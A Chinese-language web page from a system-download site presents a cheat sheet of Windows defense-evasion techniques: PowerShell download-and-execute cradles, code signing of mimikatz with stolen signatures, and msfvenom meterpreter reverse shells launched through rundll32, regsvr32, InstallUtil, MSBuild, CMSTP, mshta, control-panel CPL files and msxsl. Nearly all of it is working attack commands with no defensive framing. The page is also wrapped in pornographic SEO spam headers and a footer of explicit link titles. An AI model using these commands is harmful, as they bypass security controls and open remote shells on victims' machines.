欲奴观看免费80s-欲孽横流(np高h)最新章节-欲梦ai换脸www在线观看视频-欲漫色-久久乐国产精品亚洲综合m3u8-久久老色鬼天天综合网观看

系統家園 - 系統下載更安全,全網最新系統專題大全。
最新更新 系統重裝教程(一看就會視頻+圖文版)
當前位置: 首頁 > 系統教程 > win11教程

Windows命令執行防御規避總結

更新日期:2023-09-22 10:16:06

來源:系統之家

手機掃碼繼續觀看
Windows命令執行防御規避總結

  今天小編為大家帶來Windows命令執行防御規避總結,具體如下:

Windows命令執行防御規避總結

  powershell

  powershell.exe -nop -w hidden -c \“IEX ((new-object net.webclient).downloadstring(‘https://xx.xx.xx.xx:8888/logo.gif’))\”“ /f

  SIP

  通過sip劫持對惡意代碼簽名獲得系統信任https://github.com/secretsquirrel/SigThief

  python sigthief.py -i consent.exe -t mimikatz.exe -o signed-mimikatz.exe

  rundll32.exe

  生成

  msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=4444 -f dll 》xxx.dll

  目標執行

  rundll32.exe shell32.dll,Control_RunDLL xxx.dll

  Regsvr32.exe

  msfconsole

  auxiliary/server/regsvr32_command_delivery_server

  set CMD net user test 123456 /add

  目標執行

  regsvr32 /s /n /u /i:https://xx.xx.xx.xx:8080/aPxOb0o scrobj.dll

  InstallUtil.exe

  1.編譯后門:

  C:\Windows\Microsoft.NET\Framework64\v4.0.30319》csc.exe /r:System.EnterpriseServices.dll /unsafe /target:library /out:xxx.exe /keyfile:”C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\x64\key.snk“ xxx.cs

  2.靶機上運行:

  InstallUtil.exe /U xxx.exe

  3.msf監聽,得到反彈的shell:

  set payload windows/x64/meterpreter/reverse_tcp

  set LHOST xx.xx.xx.xx

  set LPORT 4444

  exploit

  Msbuild.exe

  MSBuild是Microsoft Build Engine的縮寫,代表Microsoft和Visual Studio的新的生成平臺,MSBuild可編譯特定格式的xml文件

  https://github.com/3gstudent/msbuild-inline-task

  msf生成shellcode

  msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=xx.xx.xx.xx lport=4444

  -f csharp

  使用shellcode替換https://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20x64%20shellcode.xml中的shellcode部分

  msf監聽

  use exploit/multi/handler

  set payload windows/x64/meterpreter/reverse_tcp

  set lhost xx.xx.xx.xx

  set lport 4444

  exploit

  運行

  C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe exec64.xml

  CMSTP

  cmstp.exe /s /ns C:\Users\administrator\AppData\Local\Temp\XKNqbpzl.txt繞過AppLocker并啟動惡意腳本

  Mshta.exe

  Mshta.exe 是一個執行 Microsoft HTML 應用程序 (HTA) 的實用程序,攻擊者可以使用 mshta.exe 通過受信任的 Windows 實用程序代理執行惡意代碼

  use exploit/windows/misc/hta_server

  msf exploit(windows/misc/hta_server) 》 set srvhost xx.xx.xx.xx

  msf exploit(windows/misc/hta_server) 》 exploit

  mshta.exe https://xx.xx.xx.xx:8080/xxxxxxx.hta

  控制面板

  攻擊者可以使用控制面板項作為有效載荷來執行任意命令,控制面板項是注冊的可執行文件(.exe)或控制面板(.cpl)文件,可以直接從命令行執行或通過Control_RunDLL(API)調用或者直接雙擊文件。

  攻擊者構造惡意的dll文件CPIApplet.dll

  利用msf生成dll文件

  msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=170.170.64.17 LPORT=4444 -f dll 》 /tmp/CPIApplet.dll

  傳入windows機器,然后重命名為CPIApplet.cpl,通過control.exe c:\users\administrator\desktop\CPIApplet.cpl 執行命令

  通過msxsl.exe調用惡意xml文件執行腳本

  制作兩個文件

  customers.xml

  script.xsl

  xmlns:xsl=”https://www.w3.org/1999/XSL/Transform“

  xmlns:msxsl=”urn:schemas-microsoft-com:xslt“

  xmlns:user=”https://mycompany.com/mynamespace“》

  function xml(nodelist) {

  var r = new ActiveXObject(”WScript.Shell“).Run(”cmd.exe /k calc.exe“);

  return nodelist.nextNode().xml;

  }

  開啟http服務

  python3 -m http.server 80

  遠程下載執行

  msxsl.exe https://xx.xx.xx.xx/customers.xml https://xx.xx.xx.xx/scrip.xsl

該文章是否有幫助到您?
Windows 10 系統在線下載
Windows 10 是迄今為止最好的 Windows|前往下載,成就你的非凡
立即下載 視頻教程:如何安裝該系統?
常見問題
系統下載排行

其他人正在下載 更多
安卓下載 更多
手機上觀看
掃碼手機上觀看
主站蜘蛛池模板: 蜜桃色欲AV久久无码精品 | 精品精品国产自在现拍 | 亚洲AV电影天堂男人的天堂 | 欧美在线看费视频在线 | 黄片a级毛片 | mxgs-877痉挛媚药按摩 | 牲高潮99爽久久久久777 | 久久爱狠狠综合网 | 精品夜夜澡人妻无码AV蜜桃 | 九九黄色大片 | 亚洲精品久久久无码一区二区 | 国产精品色吧国产精品 | 一级毛片皇帝 宫女 | 免费看男人J放进女人J无遮掩 | 久久精品国产欧美 | 国产99热在线观看 | 青青草原在线新免费 | 国产午夜高潮熟女精品AV | 玩两个少妇女邻居 | 中文字幕人成人乱码亚洲AV | 69日本xxⅹxxxxx18| 国产AV在线传媒麻豆 | 久久黄色小视频 | 午夜免费无码福利视频麻豆 | 中文字幕人成乱码中国 | 校园女教师之禁区 | 国产成人精品系列在线观看 | 日韩精品一卡二卡三卡四卡2021 | 超碰caopro熟女m超碰分类 | 成人免费一区二区无码视频 | 含羞草免费完整视频在线观看 | 99riav9 精品香蕉免费大视频 | 朋友的娇妻好爽好烫嗯 | 国产精品爽爽久久久久久蜜桃 | 高h乱一受多攻男男 | 亚洲一区二区三区乱码在线欧洲 | 国产呦精品一区二区三区网站 | 最近中文字幕MV高清在线 | 欧美gay69| 亚洲精品成人a在线观看 | 天天久久狠狠色综合 |